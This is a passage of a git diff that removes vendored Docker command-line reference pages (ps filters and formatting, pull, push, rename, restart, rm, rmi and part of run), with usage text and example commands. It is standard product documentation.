For example, with the same containers as in `before` filter: - -```bash -$ docker ps -f since=6e63f6ff38b0 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9c3527ed70ce busybox "top" 10 minutes ago Up 10 minutes desperate_dubinsky -4aace5031105 busybox "top" 10 minutes ago Up 10 minutes focused_hamilton -``` - -#### Volume - -The `volume` filter shows only containers that mount a specific volume or have -a volume mounted in a specific path: - -```bash{% raw %} -$ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" -CONTAINER ID MOUNTS -9c3527ed70ce remote-volume - -$ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}" -CONTAINER ID MOUNTS -9c3527ed70ce remote-volume -{% endraw %}``` - -#### Network - -The `network` filter shows only containers that are connected to a network with -a given name or id. - -The following filter matches all containers that are connected to a network -with a name containing `net1`. - -```bash -$ docker run -d --net=net1 --name=test1 ubuntu top -$ docker run -d --net=net2 --name=test2 ubuntu top - -$ docker ps --filter network=net1 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 -``` - -The network filter matches on both the network's name and id. The following -example shows all containers that are attached to the `net1` network, using -the network id as a filter; - -```bash -{% raw %} -$ docker network inspect --format "{{.ID}}" net1 -{% endraw %} - -8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 - -$ docker ps --filter network=8c0b4110ae930dbe26b258de9bc34a03f98056ed6f27f991d32919bfe401d7c5 - -CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -9d4893ed80fe ubuntu "top" 10 minutes ago Up 10 minutes test1 -``` - -## Formatting - -The formatting option (`--format`) pretty-prints container output using a Go -template. 
- -Valid placeholders for the Go template are listed below: - -Placeholder | Description ---------------|---------------------------------------------------------------------------------------------------- -`.ID` | Container ID -`.Image` | Image ID -`.Command` | Quoted command -`.CreatedAt` | Time when the container was created. -`.RunningFor` | Elapsed time since the container was started. -`.Ports` | Exposed ports. -`.Status` | Container status. -`.Size` | Container disk size. -`.Names` | Container names. -`.Labels` | All labels assigned to the container. -`.Label` | Value of a specific label for this container. For example `'{% raw %}{{.Label "com.docker.swarm.cpu"}}{% endraw %}'` -`.Mounts` | Names of the volumes mounted in this container. -`.Networks` | Names of the networks attached to this container. - -When using the `--format` option, the `ps` command will either output the data -exactly as the template declares or, when using the `table` directive, includes -column headers as well. 
- -The following example uses a template without headers and outputs the `ID` and -`Command` entries separated by a colon for all running containers: - -```bash -{% raw %} -$ docker ps --format "{{.ID}}: {{.Command}}" -{% endraw %} - -a87ecb4f327c: /bin/sh -c #(nop) MA -01946d9d34d8: /bin/sh -c #(nop) MA -c1d3b0166030: /bin/sh -c yum -y up -41d50ecd2f57: /bin/sh -c #(nop) MA -``` - -To list all running containers with their labels in a table format you can use: - -```bash -{% raw %} -$ docker ps --format "table {{.ID}}\t{{.Labels}}" -{% endraw %} - -CONTAINER ID LABELS -a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd -01946d9d34d8 -c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 -41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md b/vendor/github.com/docker/docker/docs/reference/commandline/pull.md deleted file mode 100644 index 0c960b404a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/pull.md +++ /dev/null @@ -1,252 +0,0 @@ ---- -title: "pull" -description: "The pull command description and usage" -keywords: "pull, image, hub, docker" ---- - - - -# pull - -```markdown -Usage: docker pull [OPTIONS] NAME[:TAG|@DIGEST] - -Pull an image or a repository from a registry - -Options: - -a, --all-tags Download all tagged images in the repository - --disable-content-trust Skip image verification (default true) - --help Print usage -``` - -Most of your images will be created on top of a base image from the -[Docker Hub](https://hub.docker.com) registry. - -[Docker Hub](https://hub.docker.com) contains many pre-built images that you -can `pull` and try without needing to define and configure your own. - -To download a particular image, or set of images (i.e., a repository), -use `docker pull`. 
- -## Proxy configuration - -If you are behind an HTTP proxy server, for example in corporate settings, -before open a connect to registry, you may need to configure the Docker -daemon's proxy settings, using the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` -environment variables. To set these environment variables on a host using -`systemd`, refer to the [control and configure Docker with systemd](https://docs.docker.com/engine/admin/systemd/#http-proxy) -for variables configuration. - -## Concurrent downloads - -By default the Docker daemon will pull three layers of an image at a time. -If you are on a low bandwidth connection this may cause timeout issues and you may want to lower -this via the `--max-concurrent-downloads` daemon option. See the -[daemon documentation](dockerd.md) for more details. - -## Examples - -### Pull an image from Docker Hub - -To download a particular image, or set of images (i.e., a repository), use -`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a -default. This command pulls the `debian:latest` image: - -```bash -$ docker pull debian - -Using default tag: latest -latest: Pulling from library/debian -fdd5d7827f33: Pull complete -a3ed95caeb02: Pull complete -Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa -Status: Downloaded newer image for debian:latest -``` - -Docker images can consist of multiple layers. In the example above, the image -consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. - -Layers can be reused by images. For example, the `debian:jessie` image shares -both layers with `debian:latest`. 
Pulling the `debian:jessie` image therefore -only pulls its metadata, but not its layers, because all layers are already -present locally: - -```bash -$ docker pull debian:jessie - -jessie: Pulling from library/debian -fdd5d7827f33: Already exists -a3ed95caeb02: Already exists -Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e -Status: Downloaded newer image for debian:jessie -``` - -To see which images are present locally, use the [`docker images`](images.md) -command: - -```bash -$ docker images - -REPOSITORY TAG IMAGE ID CREATED SIZE -debian jessie f50f9524513f 5 days ago 125.1 MB -debian latest f50f9524513f 5 days ago 125.1 MB -``` - -Docker uses a content-addressable image store, and the image ID is a SHA256 -digest covering the image's configuration and layers. In the example above, -`debian:jessie` and `debian:latest` have the same image ID because they are -actually the *same* image tagged with different names. Because they are the -same image, their layers are stored only once and do not consume extra disk -space. - -For more information about images, layers, and the content-addressable store, -refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/). - - -## Pull an image by digest (immutable identifier) - -So far, you've pulled images by their name (and "tag"). Using names and tags is -a convenient way to work with images. When using tags, you can `docker pull` an -image again to make sure you have the most up-to-date version of that image. -For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu -14.04 image. - -In some cases you don't want images to be updated to newer versions, but prefer -to use a fixed version of an image. Docker enables you to pull an image by its -*digest*. When pulling an image by digest, you specify *exactly* which version -of an image to pull. 
Doing so, allows you to "pin" an image to that version, -and guarantee that the image you're using is always the same. - -To know the digest of an image, pull the image first. Let's pull the latest -`ubuntu:14.04` image from Docker Hub: - -```bash -$ docker pull ubuntu:14.04 - -14.04: Pulling from library/ubuntu -5a132a7e7af1: Pull complete -fd2731e4c50c: Pull complete -28a2f68d1120: Pull complete -a3ed95caeb02: Pull complete -Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -Status: Downloaded newer image for ubuntu:14.04 -``` - -Docker prints the digest of the image after the pull has finished. In the example -above, the digest of the image is: - - sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -Docker also prints the digest of an image when *pushing* to a registry. This -may be useful if you want to pin to a version of the image you just pushed. - -A digest takes the place of the tag when pulling an image, for example, to -pull the above image by digest, run the following command: - -```bash -$ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 - -sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu -5a132a7e7af1: Already exists -fd2731e4c50c: Already exists -28a2f68d1120: Already exists -a3ed95caeb02: Already exists -Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -``` - -Digest can also be used in the `FROM` of a Dockerfile, for example: - -```Dockerfile -FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -MAINTAINER some maintainer -``` - -> **Note**: Using this feature "pins" an image to a specific version in time. -> Docker will therefore not pull updated versions of an image, which may include -> security updates. 
If you want to pull an updated image, you need to change the -> digest accordingly. - - -## Pulling from a different registry - -By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to -manually specify the path of a registry to pull from. For example, if you have -set up a local registry, you can specify its path to pull from it. A registry -path is similar to a URL, but does not contain a protocol specifier (`https://`). - -The following command pulls the `testing/test-image` image from a local registry -listening on port 5000 (`myregistry.local:5000`): - -```bash -$ docker pull myregistry.local:5000/testing/test-image -``` - -Registry credentials are managed by [docker login](login.md). - -Docker uses the `https://` protocol to communicate with a registry, unless the -registry is allowed to be accessed over an insecure connection. Refer to the -[insecure registries](dockerd.md#insecure-registries) section for more information. - - -## Pull a repository with multiple images - -By default, `docker pull` pulls a *single* image from the registry. A repository -can contain multiple images. To pull all images from a repository, provide the -`-a` (or `--all-tags`) option when using `docker pull`. - -This command pulls all images from the `fedora` repository: - -```bash -$ docker pull --all-tags fedora - -Pulling repository fedora -ad57ef8d78d7: Download complete -105182bb5e8b: Download complete -511136ea3c5a: Download complete -73bd853d2ea5: Download complete -.... - -Status: Downloaded newer image for fedora -``` - -After the pull has completed use the `docker images` command to see the -images that were pulled. 
The example below shows all the `fedora` images -that are present locally: - -```bash -$ docker images fedora - -REPOSITORY TAG IMAGE ID CREATED SIZE -fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB -fedora 20 105182bb5e8b 5 days ago 372.7 MB -fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB -fedora latest 105182bb5e8b 5 days ago 372.7 MB -``` - -## Canceling a pull - -Killing the `docker pull` process, for example by pressing `CTRL-c` while it is -running in a terminal, will terminate the pull operation. - -```bash -$ docker pull fedora - -Using default tag: latest -latest: Pulling from library/fedora -a3ed95caeb02: Pulling fs layer -236608c7b546: Pulling fs layer -^C -``` - -> **Note**: Technically, the Engine terminates a pull operation when the -> connection between the Docker Engine daemon and the Docker Engine client -> initiating the pull is lost. If the connection with the Engine daemon is -> lost for other reasons than a manual interaction, the pull is also aborted. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md deleted file mode 100644 index e36fd026d1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/push.md +++ /dev/null @@ -1,75 +0,0 @@ ---- -title: "push" -description: "The push command description and usage" -keywords: "share, push, image" ---- - - - -# push - -```markdown -Usage: docker push [OPTIONS] NAME[:TAG] - -Push an image or a repository to a registry - -Options: - --disable-content-trust Skip image verification (default true) - --help Print usage -``` - -Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) -registry or to a self-hosted one. - -Refer to the [`docker tag`](tag.md) reference for more information about valid -image and tag names. - -Killing the `docker push` process, for example by pressing `CTRL-c` while it is -running in a terminal, terminates the push operation. 
- -Registry credentials are managed by [docker login](login.md). - -## Concurrent uploads - -By default the Docker daemon will push five layers of an image at a time. -If you are on a low bandwidth connection this may cause timeout issues and you may want to lower -this via the `--max-concurrent-uploads` daemon option. See the -[daemon documentation](dockerd.md) for more details. - -## Examples - -### Pushing a new image to a registry - -First save the new image by finding the container ID (using [`docker ps`](ps.md)) -and then committing it to a new image name. Note that only `a-z0-9-_.` are -allowed when naming images: - -```bash -$ docker commit c16378f943fe rhel-httpd -``` - -Now, push the image to the registry using the image ID. In this example the -registry is on host named `registry-host` and listening on port `5000`. To do -this, tag the image with the host name or IP address, and the port of the -registry: - -```bash -$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd -$ docker push registry-host:5000/myadmin/rhel-httpd -``` - -Check that this worked by running: - -```bash -$ docker images -``` - -You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` -listed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md deleted file mode 100644 index be035f1ce4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md +++ /dev/null @@ -1,27 +0,0 @@ ---- -title: "rename" -description: "The rename command description and usage" -keywords: "rename, docker, container" ---- - - - -# rename - -```markdown -Usage: docker rename CONTAINER NEW_NAME - -Rename a container - -Options: - --help Print usage -``` - -The `docker rename` command allows the container to be renamed to a different name. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md deleted file mode 100644 index 9f7ed00553..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md +++ /dev/null @@ -1,26 +0,0 @@ ---- -title: "restart" -description: "The restart command description and usage" -keywords: "restart, container, Docker" ---- - - - -# restart - -```markdown -Usage: docker restart [OPTIONS] CONTAINER [CONTAINER...] - -Restart one or more containers - -Options: - --help Print usage - -t, --time int Seconds to wait for stop before killing the container (default 10) -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md deleted file mode 100644 index 1c3e795933..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md +++ /dev/null @@ -1,69 +0,0 @@ ---- -title: "rm" -description: "The rm command description and usage" -keywords: "remove, Docker, container" ---- - - - -# rm - -```markdown -Usage: docker rm [OPTIONS] CONTAINER [CONTAINER...] - -Remove one or more containers - -Options: - -f, --force Force the removal of a running container (uses SIGKILL) - --help Print usage - -l, --link Remove the specified link - -v, --volumes Remove the volumes associated with the container -``` - -## Examples - - $ docker rm /redis - /redis - -This will remove the container referenced under the link -`/redis`. - - $ docker rm --link /webapp/redis - /webapp/redis - -This will remove the underlying link between `/webapp` and the `/redis` -containers removing all network communication. - - $ docker rm --force redis - redis - -The main process inside the container referenced under the link `/redis` will receive -`SIGKILL`, then the container will be removed. - - $ docker rm $(docker ps -a -q) - -This command will delete all stopped containers. 
The command -`docker ps -a -q` will return all existing container IDs and pass them to -the `rm` command which will delete them. Any running containers will not be -deleted. - - $ docker rm -v redis - redis - -This command will remove the container and any volumes associated with it. -Note that if a volume was specified with a name, it will not be removed. - - $ docker create -v awesome:/foo -v /bar --name hello redis - hello - $ docker rm -v hello - -In this example, the volume for `/foo` will remain intact, but the volume for -`/bar` will be removed. The same behavior holds for volumes inherited with -`--volumes-from`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md deleted file mode 100644 index 149b7635b6..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md +++ /dev/null @@ -1,83 +0,0 @@ ---- -title: "rmi" -description: "The rmi command description and usage" -keywords: "remove, image, Docker" ---- - - - -# rmi - -```markdown -Usage: docker rmi [OPTIONS] IMAGE [IMAGE...] - -Remove one or more images - -Options: - -f, --force Force removal of the image - --help Print usage - --no-prune Do not delete untagged parents -``` - -You can remove an image using its short or long ID, its tag, or its digest. If -an image has one or more tag referencing it, you must remove all of them before -the image is removed. Digest references are removed automatically when an image -is removed by tag. 
- - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - - $ docker rmi fd484f19954f - Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force - 2013/12/11 05:47:16 Error: failed to remove one or more images - - $ docker rmi test1 - Untagged: test1:latest - $ docker rmi test2 - Untagged: test2:latest - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - $ docker rmi test - Untagged: test:latest - Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 - -If you use the `-f` flag and specify the image's short or long ID, then this -command untags and removes all images that match the specified ID. - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - - $ docker rmi -f fd484f19954f - Untagged: test1:latest - Untagged: test:latest - Untagged: test2:latest - Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 - -An image pulled by digest has no tag associated with it: - - $ docker images --digests - REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE - localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB - -To remove an image using its digest: - - $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf - Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf - Deleted: 
4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125 - Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2 - Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md deleted file mode 100644 index e57ba4bbea..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/run.md +++ /dev/null @@ -1,732 +0,0 @@ ---- -title: "run" -description: "The run command description and usage" -keywords: "run, command, container" ---- - - - -# run - -```markdown -Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] - -Run a command in a new container - -Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --blkio-weight-device value Block IO weight (relative device weight) (default []) - --cap-add value Add Linux capabilities (default []) - --cap-drop value Drop Linux capabilities (default []) - --cgroup-parent string Optional parent cgroup for the container - --cidfile string Write the container ID to the file - --cpu-count int The number of CPUs available for execution by the container. - Windows daemon only. On Windows Server containers, this is - approximated as a percentage of total CPU usage. - --cpu-percent int Limit percentage of CPU available for execution - by the container. Windows daemon only. - The processor resource controls are mutually - exclusive, the order of precedence is CPUCount - first, then CPUShares, and CPUPercent last. 
- --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpus NanoCPUs Number of CPUs (default 0.000) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - -d, --detach Run container in background and print container ID - --detach-keys string Override the key sequence for detaching a container - --device value Add a host device to the container (default []) - --device-read-bps value Limit read rate (bytes per second) from a device (default []) - --device-read-iops value Limit read rate (IO per second) from a device (default []) - --device-write-bps value Limit write rate (bytes per second) to a device (default []) - --device-write-iops value Limit write rate (IO per second) to a device (default []) - --disable-content-trust Skip image verification (default true) - --dns value Set custom DNS servers (default []) - --dns-option value Set DNS options (default []) - --dns-search value Set custom DNS search domains (default []) - --entrypoint string Overwrite the default ENTRYPOINT of the image - -e, --env value Set environment variables (default []) - --env-file value Read in a file of environment variables (default []) - --expose value Expose a port or a range of ports (default []) - --group-add value Add additional groups to join (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) - --help Print usage - -h, --hostname string Container host name - 
--init Run an init inside the container that forwards signals and reaps processes - --init-path string Path to the docker-init binary - -i, --interactive Keep STDIN open even if not attached - --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) - (Windows only). The format is ``. - Unit is optional and can be `b` (bytes per second), - `k` (kilobytes per second), `m` (megabytes per second), - or `g` (gigabytes per second). If you omit the unit, - the system uses bytes per second. - --io-maxbandwidth and --io-maxiops are mutually exclusive options. - --io-maxiops uint Maximum IOps limit for the system drive (Windows only) - --ip string Container IPv4 address (e.g. 172.30.100.104) - --ip6 string Container IPv6 address (e.g. 2001:db8::33) - --ipc string IPC namespace to use - --isolation string Container isolation technology - --kernel-memory string Kernel memory limit - -l, --label value Set meta data on a container (default []) - --label-file value Read in a line delimited file of labels (default []) - --link value Add link to another container (default []) - --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) - --log-driver string Logging driver for the container - --log-opt value Log driver options (default []) - --mac-address string Container MAC address (e.g. 
92:d0:c6:0a:29:33) - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) - --name string Assign a name to the container - --network-alias value Add network-scoped alias for the container (default []) - --network string Connect a container to a network - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-healthcheck Disable any container-specified HEALTHCHECK - --oom-kill-disable Disable OOM Killer - --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) - --pid string PID namespace to use - --pids-limit int Tune container pids limit (set -1 for unlimited) - --privileged Give extended privileges to this container - -p, --publish value Publish a container's port(s) to the host (default []) - -P, --publish-all Publish all exposed ports to random ports - --read-only Mount the container's root filesystem as read only - --restart string Restart policy to apply when a container exits (default "no") - Possible values are : no, on-failure[:max-retry], always, unless-stopped - --rm Automatically remove the container when it exits - --runtime string Runtime to use for this container - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. 
- --sig-proxy Proxy received signals to the process (default true) - --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") - --stop-timeout=10 Timeout (in seconds) to stop a container - --storage-opt value Storage driver options for the container (default []) - --sysctl value Sysctl options (default map[]) - --tmpfs value Mount a tmpfs directory (default []) - -t, --tty Allocate a pseudo-TTY - --ulimit value Ulimit options (default []) - -u, --user string Username or UID (format: [:]) - --userns string User namespace to use - 'host': Use the Docker host user namespace - '': Use the Docker daemon user namespace specified by `--userns-remap` option. - --uts string UTS namespace to use - -v, --volume value Bind mount a volume (default []). The format - is `[host-src:]container-dest[:]`. - The comma-delimited `options` are [rw|ro], - [z|Z], [[r]shared|[r]slave|[r]private], and - [nocopy]. The 'host-src' is an absolute path - or a name value. - --volume-driver string Optional volume driver for the container - --volumes-from value Mount volumes from the specified container(s) (default []) - -w, --workdir string Working directory inside the container -``` - -The `docker run` command first `creates` a writeable container layer over the -specified image, and then `starts` it using the specified command. That is, -`docker run` is equivalent to the API `/containers/create` then -`/containers/(id)/start`. A stopped container can be restarted with all its -previous changes intact using `docker start`. See `docker ps -a` to view a list -of all containers. - -The `docker run` command can be used in combination with `docker commit` to -[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md). - -For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/). 
- -## Examples - -### Assign name and allocate pseudo-TTY (--name, -it) - - $ docker run --name test -it debian - root@d6c0fe130dba:/# exit 13 - $ echo $? - 13 - $ docker ps -a | grep test - d6c0fe130dba debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test - -This example runs a container named `test` using the `debian:latest` -image. The `-it` instructs Docker to allocate a pseudo-TTY connected to -the container's stdin; creating an interactive `bash` shell in the container. -In the example, the `bash` shell is quit by entering -`exit 13`. This exit code is passed on to the caller of -`docker run`, and is recorded in the `test` container's metadata. - -### Capture container ID (--cidfile) - - $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test" - -This will create a container and print `test` to the console. The `cidfile` -flag makes Docker attempt to create a new file and write the container ID to it. -If the file exists already, Docker will return an error. Docker will close this -file when `docker run` exits. - -### Full container capabilities (--privileged) - - $ docker run -t -i --rm ubuntu bash - root@bc338942ef20:/# mount -t tmpfs none /mnt - mount: permission denied - -This will *not* work, because by default, most potentially dangerous kernel -capabilities are dropped; including `cap_sys_admin` (which is required to mount -filesystems). However, the `--privileged` flag will allow it to run: - - $ docker run -t -i --privileged ubuntu bash - root@50e3f57e16e6:/# mount -t tmpfs none /mnt - root@50e3f57e16e6:/# df -h - Filesystem Size Used Avail Use% Mounted on - none 1.9G 0 1.9G 0% /mnt - -The `--privileged` flag gives *all* capabilities to the container, and it also -lifts all the limitations enforced by the `device` cgroup controller. In other -words, the container can then do almost everything that the host can do. This -flag exists to allow special use-cases, like running Docker within Docker. 
- -### Set working directory (-w) - - $ docker run -w /path/to/dir/ -i -t ubuntu pwd - -The `-w` lets the command being executed inside directory given, here -`/path/to/dir/`. If the path does not exist it is created inside the container. - -### Set storage driver options per container - - $ docker run -it --storage-opt size=120G fedora /bin/bash - -This (size) will allow to set the container rootfs size to 120G at creation time. -This option is only available for the `devicemapper`, `btrfs`, `overlay2`, -`windowsfilter` and `zfs` graph drivers. -For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, -user cannot pass a size less than the Default BaseFS Size. -For the `overlay2` storage driver, the size option is only available if the -backing fs is `xfs` and mounted with the `pquota` mount option. -Under these conditions, user can pass any size less then the backing fs size. - -### Mount tmpfs (--tmpfs) - - $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image - -The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`, -`noexec`, `nosuid`, `size=65536k` options. - -### Mount volume (-v, --read-only) - - $ docker run -v `pwd`:`pwd` -w `pwd` -i -t ubuntu pwd - -The `-v` flag mounts the current working directory into the container. The `-w` -lets the command being executed inside the current working directory, by -changing into the directory to the value returned by `pwd`. So this -combination executes the command using the container, but inside the -current working directory. - - $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash - -When the host directory of a bind-mounted volume doesn't exist, Docker -will automatically create this directory on the host for you. In the -example above, Docker will create the `/doesnt/exist` -folder before starting your container. 
- - $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here - -Volumes can be used in combination with `--read-only` to control where -a container writes files. The `--read-only` flag mounts the container's root -filesystem as read only prohibiting writes to locations other than the -specified volumes for the container. - - $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh - -By bind-mounting the docker unix socket and statically linked docker -binary (refer to [get the linux binary]( -https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)), -you give the container the full access to create and manipulate the host's -Docker daemon. - -On Windows, the paths must be specified using Windows-style semantics. - - PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt - Contents of file - - PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt - Contents of file - -The following examples will fail when using Windows-based containers, as the -destination of a volume or bind-mount inside the container must be one of: -a non-existing or empty directory; or a drive other than C:. Further, the source -of a bind mount must be a local directory, not a file. - - net use z: \\remotemachine\share - docker run -v z:\foo:c:\dest ... - docker run -v \\uncpath\to\directory:c:\dest ... - docker run -v c:\foo\somefile.txt:c:\dest ... - docker run -v c:\foo:c: ... - docker run -v c:\foo:c:\existing-directory-with-contents ... - -For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/) - -### Publish or expose port (-p, --expose) - - $ docker run -p 127.0.0.1:80:8080 ubuntu bash - -This binds port `8080` of the container to port `80` on `127.0.0.1` of the host -machine. 
The [Docker User -Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/) -explains in detail how to manipulate ports in Docker. - - $ docker run --expose 80 ubuntu bash - -This exposes port `80` of the container without publishing the port to the host -system's interfaces. - -### Set environment variables (-e, --env, --env-file) - - $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash - -This sets simple (non-array) environmental variables in the container. For -illustration all three -flags are shown here. Where `-e`, `--env` take an environment variable and -value, or if no `=` is provided, then that variable's current value, set via -`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1` -in the container). When no `=` is provided and that variable is not defined -in the client's environment then that variable will be removed from the -container's list of environment variables. All three flags, `-e`, `--env` and -`--env-file` can be repeated. - -Regardless of the order of these three flags, the `--env-file` are processed -first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will -override variables as needed. - - $ cat ./env.list - TEST_FOO=BAR - $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO - TEST_FOO=This is a test - -The `--env-file` flag takes a filename as an argument and expects each line -to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. 
